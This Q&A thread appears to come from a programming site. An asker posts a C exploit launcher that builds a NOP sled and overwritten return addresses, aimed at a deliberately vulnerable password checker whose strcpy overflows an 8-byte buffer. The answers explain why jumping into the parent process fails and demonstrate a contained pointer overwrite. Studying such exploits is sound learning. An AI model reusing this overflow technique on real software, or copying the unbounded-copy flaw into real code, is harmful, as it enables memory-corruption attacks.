Reputation: 751
I am executing a program B from the main function of another program A by the C library function system(). But when I pass an address of A to B as an argument, to replace the return address in process B by buffer overflow, it shows a segmentation fault.

I know each process cannot access the address space of another process. But is there any way I can buffer overflow the child process so that execution returns to the parent process? I am using an x64 machine and gcc with the -m32 and -fno-stack-protector options.
This is the program A from which I am executing the other program B:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>   /* bzero */

int main(int argc, char *argv[]) {
    unsigned int i, ret, offset = 270;
    char *command, *buffer;
    command = (char *) malloc(200);
    bzero(command, 200);                 // zero out the new memory
    strcpy(command, "./child \'");        // start command buffer
    buffer = command + strlen(command);  // set buffer at the end
    if (argc > 1)                        // set offset
        offset = atoi(argv[1]);
    ret = (unsigned int) &i - offset;    // set return address (taken from this process's own stack)
    for (i = 0; i < 160; i += 4)         // fill buffer with return address
        *((unsigned int *)(buffer + i)) = ret;
    memset(buffer, 0x90, 60);            // add NOP instructions
    strcat(command, "\'");
    system(command);                     // run another program
    free(command);
    return 0;
}
```
And this is the other program B, which is vulnerable to buffer overflow:

```c
#include <stdio.h>
#include <string.h>

int testAuthenetication(char *password) {
    int value = 0;
    char buffer[8];
    strcpy(buffer, password);            // unbounded copy: the overflow happens here
    if (strcmp(buffer, "abcd") == 0) {
        value = 1;
    }
    if (strcmp(buffer, "abcdef") == 0) {
        value = 1;
    }
    return value;
}

int main(int argc, char *argv[]) {
    if (argc < 2) {
        printf("Enter the password \n");
        return 0;
    }
    if (testAuthenetication(argv[1])) {
        printf("Access Granted \n");
    }
    else {
        printf("Access denied \n");
    }
    return 0;
}
```
Upvotes: 0
Views: 329
Reputation: 382532
"so that execution returns to the parent process": I don't see how this is possible. The instructions of the parent process are in another memory space (different page tables, selected by the kernel through CR3), so if you try to jump to the address of the parent from the child, there will be trash / invalid pages there.

I recommend that you state the context / end goal more clearly: are you trying to do arbitrary code execution from an overflow, is that it? And B is the vulnerable program, and A the exploit code?

If that is the case, try to write the arbitrary code to an executable portion of the memory of the child process, and then use the overflow to jump to it, all in the child process itself. I am not sure if this will work.

The Y of this X has been asked less precisely at: How are buffer overflows used to exploit computers? (but none of the answers currently gives a minimal example).
Upvotes: 1
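The two points in the answer above, as an added example that is not code from the question or the answer: first, that a child process has its own memory, so a value written at some address in the child is not visible at the same address in the parent (and an address taken in the parent means nothing in an exec'd child); second, that redirecting control flow through an overflow only works with an address that is valid in the process doing the jump. The `struct frame`, `g_marker`, `win`/`lose` and the helper names are this example's own choices. The struct stands in for a stack frame (an 8-byte buffer followed by a code pointer playing the role of the saved return address) so that the layout is fixed and the demonstration runs the same on 32-bit and 64-bit builds; a real saved return address sits at a compiler-dependent offset, which is why the question's program needs an `offset` argument, and on a modern system it would also face NX and ASLR.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Part 1: a child process has its own copy of memory.
 * g_marker lives at the same virtual address in parent and child, but
 * after fork() the child writes to a private (copy-on-write) page, so
 * the parent never sees the new value. The child reports what it saw
 * through its exit status. (Hypothetical global for this example.) */
static volatile int g_marker = 0;

/* Returns 1 if the child observed its own write and the parent did not,
 * 0 if the write leaked across, -1 on a fork/wait failure. */
int child_write_invisible_to_parent(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        g_marker = 42;          /* same address as in the parent, different page */
        _exit(g_marker);        /* exit status carries the child's view (42) */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    int child_saw = WEXITSTATUS(status);   /* 42 */
    int parent_sees = g_marker;            /* still 0 */
    return (child_saw == 42 && parent_sees == 0) ? 1 : 0;
}

/* Part 2: redirecting control flow works only with an address that is
 * valid in the process doing the jump. The struct stands in for a stack
 * frame: an 8-byte buffer followed by a code pointer that plays the role
 * of the saved return address. */
static int g_win_called = 0;
static void win(void)  { g_win_called = 1; }   /* where we want to land */
static void lose(void) { g_win_called = 0; }   /* the "legitimate" target */

struct frame {
    char buffer[8];
    void (*ret)(void);
};

/* Copies an oversized, constructed payload into the frame the way an
 * unbounded strcpy would, then "returns" through the overwritten pointer.
 * Returns 1 if control reached win(). */
int redirect_in_same_process(void (*target)(void))
{
    struct frame f;
    f.ret = lose;
    g_win_called = 0;

    /* Constructed payload: 8 filler bytes, then the target address in
     * native byte order, the same idea as the question's loop filling
     * the argument with `ret`. Here the address is taken in this process,
     * so it is meaningful to this process. */
    unsigned char payload[sizeof(struct frame)];
    memset(payload, 'A', sizeof f.buffer);
    memcpy(payload + sizeof f.buffer, &target, sizeof target);

    memcpy(&f, payload, sizeof payload);   /* overflow: filler fills buffer, address lands over ret */
    f.ret();                               /* control transfer through the overwritten pointer */
    return g_win_called;
}

int demo_redirect(void) { return redirect_in_same_process(win); }

int main(void)
{
    printf("&g_marker in this process: %p\n", (void *)&g_marker);
    printf("child write invisible to parent: %d\n", child_write_invisible_to_parent());
    printf("redirected to win() inside one process: %d\n", demo_redirect());
    return 0;
}
```

Part 1 uses fork() without exec, which is the weakest case: parent and child even share the same virtual addresses, and the write still does not cross over. system() goes further and exec's a new image, so an address computed from `&i` in A does not even refer to the same kind of object in B, which is why the jump in the question faults. Part 2 is the case the answer suggests instead: the pointer being overwritten and the address being written both belong to one process.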